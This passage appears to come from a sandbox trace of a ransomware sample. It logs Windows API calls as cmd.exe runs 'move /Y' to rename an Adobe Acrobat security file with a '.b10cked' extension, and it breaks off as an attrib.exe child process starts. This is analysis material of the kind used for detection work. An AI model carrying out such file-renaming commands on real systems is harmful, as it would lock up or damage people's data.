GetEnvironmentStringsW () returned 0x3a0240* [0146.207] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0146.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ee4c | out: phkResult=0x28ee4c*=0x40) returned 0x0 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0xd0, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x1, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x1, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x0, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x40, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.207] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x40, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x40, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.208] 
RegCloseKey (hKey=0x40) returned 0x0 [0146.208] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ee4c | out: phkResult=0x28ee4c*=0x40) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x40, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x1, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x1, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x0, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x9, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x4, lpData=0x28ee58*=0x9, lpcbData=0x28ee50*=0x4) returned 0x0 [0146.208] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee54, lpData=0x28ee58, lpcbData=0x28ee50*=0x1000 | out: lpType=0x28ee54*=0x0, lpData=0x28ee58*=0x9, lpcbData=0x28ee50*=0x1000) returned 0x2 [0146.208] RegCloseKey (hKey=0x40) returned 0x0 [0146.208] time (in: timer=0x0 | out: 
timer=0x0) returned 0x5b886374 [0146.208] srand (_Seed=0x5b886374) [0146.208] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"" [0146.208] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"" [0146.208] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.209] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a19a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.209] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.209] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.209] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.209] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.209] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.209] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.209] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.209] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.209] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.209] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.209] _wcsicmp 
(_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.209] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.209] GetEnvironmentStringsW () returned 0x3a2390* [0146.210] FreeEnvironmentStringsW (penv=0x3a2390) returned 1 [0146.210] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.210] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.210] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.210] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.210] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.210] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.210] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.210] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.210] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.210] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.210] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fc18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.210] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fc18, lpFilePart=0x28fc14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fc14*="Desktop") returned 0x18 [0146.210] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.210] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f994 | out: lpFindFileData=0x28f994) returned 0x3a0a20 [0146.210] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0146.210] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f994 | out: lpFindFileData=0x28f994) returned 0x3a0a20 [0146.211] FindClose (in: hFindFile=0x3a0a20 
| out: hFindFile=0x3a0a20) returned 1 [0146.211] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f994 | out: lpFindFileData=0x28f994) returned 0x3a0a20 [0146.211] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0146.211] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.211] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.211] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.211] GetEnvironmentStringsW () returned 0x3a0240* [0146.211] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0146.211] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.212] GetConsoleOutputCP () returned 0x1b5 [0146.212] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.212] GetUserDefaultLCID () returned 0x409 [0146.212] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd58, cchData=128 | out: lpLCData="0") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fd58, cchData=128 | out: lpLCData="0") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fd58, cchData=128 | out: lpLCData="1") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.213] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.213] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.214] GetConsoleTitleW (in: lpConsoleTitle=0x390950, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.214] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.214] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.214] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.215] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.215] _wcsicmp (_String1="move", _String2=")") returned 68 [0146.215] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0146.215] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0146.215] _wcsicmp (_String1="IF", _String2="move") returned -4 [0146.216] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0146.216] _wcsicmp (_String1="REM", _String2="move") returned 5 [0146.216] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0146.220] GetConsoleTitleW (in: lpConsoleTitle=0x28fa50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0146.354] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0146.354] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0146.354] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0146.354] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0146.354] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0146.354] _wcsicmp (_String1="move", _String2="CD") returned 10 [0146.354] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0146.354] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0146.354] _wcsicmp (_String1="move", _String2="REN") returned -5 [0146.354] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0146.354] _wcsicmp (_String1="move", _String2="SET") returned -6 [0146.354] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0146.354] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0146.354] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0146.354] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0146.355] _wcsicmp (_String1="move", _String2="MD") returned 11 [0146.355] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0146.355] _wcsicmp (_String1="move", _String2="RD") returned -5 [0146.355] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0146.355] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0146.355] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0146.355] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0146.355] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0146.355] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0146.355] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0146.355] _wcsicmp (_String1="move", _String2="VER") returned -9 [0146.355] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0146.355] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0146.355] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0146.355] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0146.355] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0146.355] _wcsicmp (_String1="move", _String2="START") returned -6 [0146.355] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0146.355] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0146.355] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0146.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.357] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0146.357] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f80c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f804, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f804*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0146.358] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0146.358] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0146.359] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0146.359] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0146.359] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0146.359] _wcsicmp (_String1="DIRECT~1.ACR", _String2=".") returned 54 [0146.359] _wcsicmp (_String1="DIRECT~1.ACR", _String2="..") returned 
54 [0146.359] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\direct~1.acr")) returned 0x2020 [0146.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a20c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.360] SetErrorMode (uMode=0x0) returned 0x0 [0146.360] SetErrorMode (uMode=0x1) returned 0x0 [0146.360] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", nBufferLength=0x104, lpBuffer=0x28f194, lpFilePart=0x28f17c | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", lpFilePart=0x28f17c*="DIRECT~1.ACR") returned 0x43 [0146.360] SetErrorMode (uMode=0x0) returned 0x1 [0146.360] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security")) returned 0x2010 [0146.360] _wcsicmp (_String1="DIRECT~1.ACR", _String2=".") returned 54 [0146.360] _wcsicmp (_String1="DIRECT~1.ACR", _String2="..") returned 54 [0146.360] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\direct~1.acr")) returned 0x2020 [0146.360] SetErrorMode (uMode=0x0) returned 0x0 [0146.360] SetErrorMode (uMode=0x1) returned 0x0 [0146.360] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", nBufferLength=0x104, lpBuffer=0x28f610, lpFilePart=0x28f3a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", lpFilePart=0x28f3a8*="DIRECT~1.ACR") returned 0x43 [0146.361] SetErrorMode (uMode=0x0) returned 0x1 [0146.361] SetErrorMode (uMode=0x0) returned 0x0 [0146.361] SetErrorMode (uMode=0x1) returned 0x0 
[0146.361] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked", nBufferLength=0x104, lpBuffer=0x28f818, lpFilePart=0x28f3a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked", lpFilePart=0x28f3a8*="directories.acrodata.b10cked") returned 0x53 [0146.361] SetErrorMode (uMode=0x0) returned 0x1 [0146.361] SetLastError (dwErrCode=0x0) [0146.361] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\directories.acrodata.b10cked")) returned 0xffffffff [0146.361] GetLastError () returned 0x2 [0146.361] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", fInfoLevelId=0x1, lpFindFileData=0x28ed24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ed24) returned 0x3a22d0 [0146.361] FindNextFileW (in: hFindFile=0x3a22d0, lpFindFileData=0x28ed24 | out: lpFindFileData=0x28ed24) returned 0 [0146.362] GetLastError () returned 0x12 [0146.362] FindClose (in: hFindFile=0x3a22d0 | out: hFindFile=0x3a22d0) returned 1 [0146.364] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR", fInfoLevelId=0x1, lpFindFileData=0x3a1e60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1e60) returned 0x3a22d0 [0146.364] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked", nBufferLength=0x104, lpBuffer=0x28efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked", lpFilePart=0x0) returned 0x53 [0146.364] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata", nBufferLength=0x104, lpBuffer=0x28efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata", lpFilePart=0x0) returned 0x4b [0146.364] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\directories.acrodata")) returned 0x2020 [0146.364] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\directories.acrodata"), lpNewFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\directories.acrodata.b10cked"), dwFlags=0x3) returned 1 [0146.365] FindClose (in: hFindFile=0x3a22d0 | out: hFindFile=0x3a22d0) returned 1 [0146.365] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28ef70 | out: _Buffer=" 1") returned 9 [0146.365] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.365] GetFileType (hFile=0x7) returned 0x2 [0146.365] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.365] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28eefc | out: lpMode=0x28eefc) returned 1 [0146.365] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.366] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28ef30 | out: lpConsoleScreenBufferInfo=0x28ef30) returned 1 [0146.366] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0146.366] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, 
lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28ef70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0146.367] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28ef54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28ef54*=0x1a) returned 1 [0146.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.367] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.367] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.367] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.367] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.368] SetConsoleInputExeNameW () returned 0x1 [0146.368] GetConsoleOutputCP () returned 0x1b5 [0146.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.368] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.368] exit (_Code=0) Process: id = "207" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xa68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "203" os_parent_pid = "0xac8" cmd_line = "attrib -r -s -h 